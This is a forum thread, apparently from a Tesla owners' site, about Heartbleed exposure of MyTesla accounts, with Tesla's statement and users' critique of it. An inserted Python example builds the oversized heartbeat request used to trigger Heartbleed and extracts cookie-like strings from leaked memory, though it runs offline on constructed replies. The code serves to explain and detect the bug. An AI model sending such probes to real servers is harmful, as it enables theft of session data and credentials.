
Accounts affected by Heartbleed bug?

anticitizen13.7 (United States):
I'm sure most people here are aware of the OpenSSL bug called "Heartbleed" that made headlines last week (http://arstechnica.com/information-...xplains-openssl-mistake-that-put-web-at-risk/ for a recap).

Did Tesla have any response to this? They might not have been affected, but given that some Model S functions can be activated via the mobile phone app, it might be prudent to check.

Hopefully the Hacker Princess is keeping things safe at Tesla.
 

alset (Boston):
Unclear if Tesla uses OpenSSL and, if so, what version (see the LastPass Heartbleed checker).

Tesla should really post something in their blog about it. There's a decent chance they'll recommend that everyone change their password, but we need to be sure they're not running a vulnerable server first. If they're not vulnerable, I'd also love to know why (but we might not get that info).

On a related note, the case of anyone who shared their password with other sites that bridged over to the Tesla REST APIs should probably be discussed here too. I don't know what the sites are, but a comment from the site maintainers would be good.
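The kind of check the LastPass link performs, as an added example that is not from the original post, from LastPass or from Tesla: it builds the single TLS heartbeat record a Heartbleed scanner sends (RFC 6520 message inside a content-type 0x18 record, with a payload length larger than the payload actually sent) and classifies the reply. The TLS handshake that precedes it on a real socket is omitted, there is no network code, and every reply, including the "leaked" heap contents, is constructed here so the example runs offline.

```python
import re
import struct

# TLS record content types and heartbeat message types (RFC 5246, RFC 6520)
CT_ALERT = 0x15
CT_HEARTBEAT = 0x18
HB_REQUEST = 0x01
HB_RESPONSE = 0x02
TLS_1_1 = 0x0302


def build_heartbeat_request(claimed_len, payload=b"", version=TLS_1_1):
    """TLS record carrying a HeartbeatRequest whose header claims
    `claimed_len` payload bytes while only len(payload) bytes are sent.
    Unpatched OpenSSL trusts the claimed length and copies that many bytes
    from its heap into the reply; a patched build checks it against the
    record length and silently drops the message, as RFC 6520 requires."""
    body = struct.pack(">BH", HB_REQUEST, claimed_len) + payload
    return struct.pack(">BHH", CT_HEARTBEAT, version, len(body)) + body


def classify_reply(reply, sent_payload):
    """Classify the bytes received after the probe.
    Returns (verdict, leaked): verdict is 'vulnerable', 'patched' or
    'not-heartbeat'; leaked is whatever was echoed beyond our own payload."""
    if len(reply) < 5:
        # no record at all: the server dropped the malformed heartbeat
        # (or closed the connection), which is the patched behaviour
        return "patched", b""
    ctype, _version, rlen = struct.unpack(">BHH", reply[:5])
    if ctype != CT_HEARTBEAT:
        # e.g. an alert record: the heartbeat was not answered at all
        return "not-heartbeat", b""
    body = reply[5:5 + rlen]
    if len(body) < 3 or body[0] != HB_RESPONSE:
        return "not-heartbeat", b""
    (plen,) = struct.unpack(">H", body[1:3])
    echoed = body[3:3 + plen]
    if len(echoed) > len(sent_payload):
        # everything past our own payload came out of the server's memory
        return "vulnerable", echoed[len(sent_payload):]
    return "patched", b""


def extract_strings(leaked, min_len=6):
    """Pull printable runs out of leaked memory, the way a scanner surfaces
    cookies, credentials or form fields from a Heartbleed dump."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, leaked)]


def make_reply(echoed, version=TLS_1_1):
    """Constructed HeartbeatResponse record echoing `echoed` plus the 16
    bytes of padding RFC 6520 requires. Stands in for a real server."""
    body = struct.pack(">BH", HB_RESPONSE, len(echoed)) + echoed + b"\x00" * 16
    return struct.pack(">BHH", CT_HEARTBEAT, version, len(body)) + body


def demo():
    """Run the classifier over three constructed server behaviours."""
    probe_payload = b"ping"
    probe = build_heartbeat_request(0x4000, probe_payload)
    # 1. vulnerable server: echoes our 4 bytes plus whatever followed them
    #    on its heap (constructed contents, not captured data)
    heap = b"\x00\x17\x00\x10POST /login HTTP/1.1\r\nCookie: session=3f9a1c\r\n"
    vuln = classify_reply(make_reply(probe_payload + heap), probe_payload)
    # 2. patched server: drops the malformed request, nothing comes back
    patched = classify_reply(b"", probe_payload)
    # 3. server without the heartbeat extension: answers with an alert
    alert_record = struct.pack(">BHH", CT_ALERT, TLS_1_1, 2) + b"\x02\x0a"
    alert = classify_reply(alert_record, probe_payload)
    return probe, vuln, patched, alert
```

Nothing in this exchange reaches the application layer, so a web server's access log never records it; that is why a site could have been read repeatedly and still truthfully report "no evidence" of exposure. Only the OpenSSL version that was running during the window tells you anything.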
 

TM Ownership (Palo Alto, CA):
Over the past week, there has been lots of online news regarding a security vulnerability within versions of OpenSSL, known as the Heartbleed Bug. After a comprehensive review of our services by our dedicated team of information security professionals, we would like to report that we have not found any evidence of compromised exposure to the OpenSSL vulnerability and that our systems, including our website and vehicle related resources, are not using a version vulnerable to the Heartbleed Bug. Your account details remain secure. Regardless, we recommend that our customers change their passwords as an added precaution.

Whether it’s developing the car that has the highest safety rating or doing everything in our power to protect our customers against online incursions, security is Tesla’s top priority. Our dedicated team of best-in-class information security professionals protect our products and systems from vulnerabilities on an ongoing basis, and we continue to work with security researchers around the world who are incentivized to report any potential issues. To offer customers an extra level of confidence, two weeks ago, we updated our minimum password requirements from six to eight characters, and we encourage the use of passwords that are considerably stronger. We have also implemented a password lockout feature that requires MyTesla account holders to reset their passwords via our website after five failed login attempts.
We have taken these steps because we consider the security of the website and mobile application of paramount importance. Just as we encourage customers to protect their MyTesla credentials with the same care they would dedicate to any of their other accounts (online or otherwise) with sensitive information, we are committed to doing what we can to ensure the maximum level of protection. It’s also important to note that, in case customers remain concerned about general online or mobile app security, we have given Model S owners the option of disabling mobile access through the Controls menu on the car’s touchscreen.

We strongly encourage anyone to report security issues on any of Tesla’s products via the Responsible Reporting process on our website: https://www.teslamotors.com/about/legal#security-vulnerability-reporting....
Through that process, we offer a range of rewards to security researchers who report valid issues to help us bolster online security and further protect our products.
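The minimum-length and five-failure lockout rules described in the post above, as an added example that is not Tesla's code: the post says nothing about how MyTesla stores passwords or runs its reset flow, so the PBKDF2 storage, the out-of-band reset token, the constant-time comparison and the dummy hash for unknown usernames are all assumptions made here.

```python
import hashlib
import hmac
import os
import secrets

MIN_PASSWORD_LEN = 8       # the six-to-eight change the post describes
MAX_FAILED_ATTEMPTS = 5    # lockout threshold the post describes
PBKDF2_ROUNDS = 100_000    # assumed; the post does not say how passwords are stored


def password_acceptable(password):
    """Length rule only; the post asks for stronger passwords but sets no other rule."""
    return len(password) >= MIN_PASSWORD_LEN


def hash_password(password, salt):
    """PBKDF2-HMAC-SHA256 (assumed storage scheme)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


class Account:
    def __init__(self, password):
        self.salt = os.urandom(16)
        self.digest = hash_password(password, self.salt)
        self.failed = 0          # consecutive failures since the last success
        self.locked = False
        self.reset_token = None  # issued on lockout, delivered out of band (assumed)


class AccountStore:
    def __init__(self):
        self.accounts = {}

    def register(self, username, password):
        if not password_acceptable(password):
            raise ValueError("password must be at least %d characters" % MIN_PASSWORD_LEN)
        self.accounts[username] = Account(password)

    def login(self, username, password):
        """Return 'ok', 'invalid' or 'locked'."""
        acct = self.accounts.get(username)
        if acct is None:
            # burn the same work as a real check so response time does not
            # reveal whether the username exists
            hash_password(password, b"\x00" * 16)
            return "invalid"
        if acct.locked:
            # even the right password is refused until the reset flow runs,
            # which is what "reset via the website" after five failures means
            return "locked"
        candidate = hash_password(password, acct.salt)
        if hmac.compare_digest(candidate, acct.digest):
            acct.failed = 0       # a success clears the counter
            return "ok"
        acct.failed += 1
        if acct.failed >= MAX_FAILED_ATTEMPTS:
            acct.locked = True
            acct.reset_token = secrets.token_urlsafe(32)
            return "locked"
        return "invalid"

    def reset_password(self, username, token, new_password):
        """Complete the reset flow: a valid single-use token unlocks the
        account and installs a new password that meets the length rule."""
        acct = self.accounts.get(username)
        if acct is None or acct.reset_token is None:
            return False
        if not hmac.compare_digest(token.encode("utf-8"), acct.reset_token.encode("utf-8")):
            return False
        if not password_acceptable(new_password):
            return False
        acct.salt = os.urandom(16)
        acct.digest = hash_password(new_password, acct.salt)
        acct.failed = 0
        acct.locked = False
        acct.reset_token = None
        return True
```

Counting failures per account has a known cost: anyone who knows a username can lock its owner out with five bad guesses, so this is normally paired with per-source rate limiting or a timed unlock rather than used alone. The reset path the post describes is the recovery route for exactly that case.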
 

Hybris (Sweden):
Please also add an SMS OTP option for the website, a PIN code lock in the car for changing settings (to protect it when with a valet, detailer, etc.), and a GPS ringfencing function for the car, meaning I get an alarm in the phone app if the car moves more than X meters/km.
 

alset (Boston):
TM Ownership said:
> Over the past week, there has been lots of online news regarding a security vulnerability within versions of OpenSSL, known as the Heartbleed Bug. After a comprehensive review of our services by our dedicated team of information security professionals, we would like to report that we have not found any evidence of compromised exposure to the OpenSSL vulnerability and that our systems, including our website and vehicle related resources, are not using a version vulnerable to the Heartbleed Bug. Your account details remain secure. Regardless, we recommend that our customers change their passwords as an added precaution.

First of all, credit to TM Ownership (and presumably internal security staff) for responding to this. The password requirement improvements and communicating a vulnerability reporting process is progress.

However, this post really feels like an earnest communication effort from a security department overly edited by a marketing department, removing the ability to know the precise security situation. By 4/15, it is clear that most web sites that were vulnerable to Heartbleed were no longer running the vulnerable versions of OpenSSL, nor had they any evidence of exposure. (There would typically not be any evidence left in a successful exploit of Heartbleed.)

What would be a better statement to make is whether Tesla was running a vulnerable version of OpenSSL during this period and that it was patched since. In that scenario, there was clear possibility of a leak and we should definitely rotate passwords - indeed many sites are requiring it. Given that you recommend that we all rotate passwords, I assume that is the case but it's a pity you are not clearer on the subject, as many web sites have been.

These two statements seem in conflict in the context of Heartbleed:
> Your account details remain secure.
> we recommend that our customers change their passwords as an added precaution.

How do you know our account details remain secure if there was ever Heartbleed exposure? If there was never exposure, please say so.

Thank you!
 

Kraken (Voltageville, CA):
Seemed simple to me. Perhaps a security risk at another site exposed someone's password there. Perhaps some people use the same passwords at Tesla too. Sounds like CYA to me.
 

anticitizen13.7 (United States):
alset said:
> First of all, credit to TM Ownership (and presumably internal security staff) for responding to this. The password requirement improvements and communicating a vulnerability reporting process is progress.
>
> However, this post really feels like an earnest communication effort from a security department overly edited by a marketing department, removing the ability to know the precise security situation. By 4/15, it is clear that most web sites that were vulnerable to Heartbleed were no longer running the vulnerable versions of OpenSSL, nor had they any evidence of exposure. (There would typically not be any evidence left in a successful exploit of Heartbleed.)
>
> What would be a better statement to make is whether Tesla was running a vulnerable version of OpenSSL during this period and that it was patched since. In that scenario, there was clear possibility of a leak and we should definitely rotate passwords - indeed many sites are requiring it. Given that you recommend that we all rotate passwords, I assume that is the case but it's a pity you are not clearer on the subject, as many web sites have been.
>
> These two statements seem in conflict in the context of Heartbleed:
> > Your account details remain secure.
> > we recommend that our customers change their passwords as an added precaution.
>
> How do you know our account details remain secure if there was ever Heartbleed exposure? If there was never exposure, please say so.
>
> Thank you!

This is a good point. Extra clarification would be welcome.

I believe that the recommendation that customers change passwords exists because there are many people who use the same password for multiple sites, despite the practice being generally discouraged. If someone has used the password they use for Tesla on another website that was affected by Heartbleed, a hacker could conceivably have stolen the password and might try it on the Tesla website. EDIT - Kraken beat me to it. Should have read through the whole thread, LOL.
 
